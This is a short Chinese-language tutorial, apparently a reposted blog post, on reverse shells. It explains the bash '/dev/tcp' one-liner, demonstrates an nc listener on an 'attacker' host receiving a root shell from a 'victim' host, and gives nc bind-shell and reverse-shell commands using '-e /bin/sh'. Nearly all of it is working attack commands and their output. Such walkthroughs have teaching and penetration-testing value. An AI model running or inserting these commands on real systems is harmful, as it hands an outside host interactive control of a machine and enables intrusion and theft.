shell反射


一、介紹

bash反射就是反彈一個交互的shell,類似ssh連接,可以執行命令

 

二、使用命令

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

 

bash -i 是打開一個交互的bash

>&  是將標准錯誤輸出定向到標准輸出中。

 /dev/tcp/ 是Linux中的一個特殊設備,打開這個文件就相當於發出了一個socket調用,建立一個socket連接,讀寫這個文件就相當於在這個socket連接中傳輸數據。同理,Linux中還存在/dev/udp/。

0>&1 是將標准輸入重定向到標准輸出中。

 

 

三、實戰測試

攻擊端

 

##安裝nc
yum install nc -y

#使用nc打開一個端口(我這使用80)
[root@server ~]# nc -v -l -p  80
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Listening on :::80
Ncat: Listening on 0.0.0.0:80

  

被攻擊端

[root@localhost~]#/bin/bash -i >& /dev/tcp/10.0.0.1/80 0>&1

  

 

查看攻擊端

[root@server  ~]# nc -v -l -p  80
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Listening on :::80
Ncat: Listening on 0.0.0.0:80
Ncat: Connection from 10.0.0.141.
Ncat: Connection from 10.0.0.141:56507.
[root@localhost~]#   //變成了被攻擊端的界面
#執行命令測試
[root@localhost~]#pwd 
pwd 
/root 
[root@localhost~]#hostname 
hostname 
localhost.localdomain 
[root@localhost~]#ll /^H

 

nc正向連接

被攻擊端: nc -lvp  8080 -e /bin/sh
攻擊端: nc -nvl 10.0.0.138 8080 

nc反向連接  

攻擊端:nc  10.0.0.138 8080
被攻擊端: nc -vv 10.0.0.132 8080 -e /bin/sh

  

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM